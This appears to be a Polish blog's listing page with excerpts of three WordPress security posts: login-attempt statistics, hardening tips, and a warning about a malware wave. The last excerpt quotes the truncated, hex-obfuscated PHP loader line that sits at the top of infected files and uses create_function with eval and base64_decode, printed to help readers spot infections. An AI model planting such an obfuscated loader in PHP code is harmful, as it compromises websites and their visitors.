Na moją stronę próbowano włamać się już 1,7 mln razy!

W styczniu 2014 roku (tak, to już 6 lat minęło), zrobiłem krótkie podsumowanie eksperymentu, podczas którego przez 4 miesiące zapisywałem wszystkie próby logowania do mojego WordPressa. Nieudanych prób było wówczas około 11 000. Aktualizując ostatnio WordPressa zauważyłem, że kod zapisujący wszelkie próby logowania wciąż działa. Zalogowałem się do bazy danych i przygotowałem kilka statystyk :)

Czytaj dalej

Na moją stronę próbowano włamać się już 11000 razy! A jak bezpieczny jest Twój WordPress?

Tylko w ciągu 4 ostatnich miesięcy, odnotowałem ponad 11 000 (tak, jedenaście tysięcy) prób włamania na mojego bloga. Poniżej zestawienie najczęściej stosowanych metod oraz kilka prostych i skutecznych porad, jak się przed nimi zabezpieczyć. Jeżeli chcesz uniknąć przykrych niespodzianek, takich jak np. kadr z gejowskiego porno na głównej, czytaj dalej :)

Czytaj dalej

Ataki na WordPressa z wykorzystaniem złośliwego kodu

Od kilku dni pojawia się coraz więcej zgłoszeń dotyczących zainfekowania przez złośliwy kod, kolejnych stron opartych o WordPressa. Na zarażonych stronach, w nagłówkach wszystkich plików z rozszerzeniem .php, pojawia się następująca linia:

<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107

Zarażone pliki można znaleźć w katalogu głównym WordPressa, w katalogach wp-admin, wp-content a także w plikach szablonów. Dosłownie wszędzie.

Czytaj dalej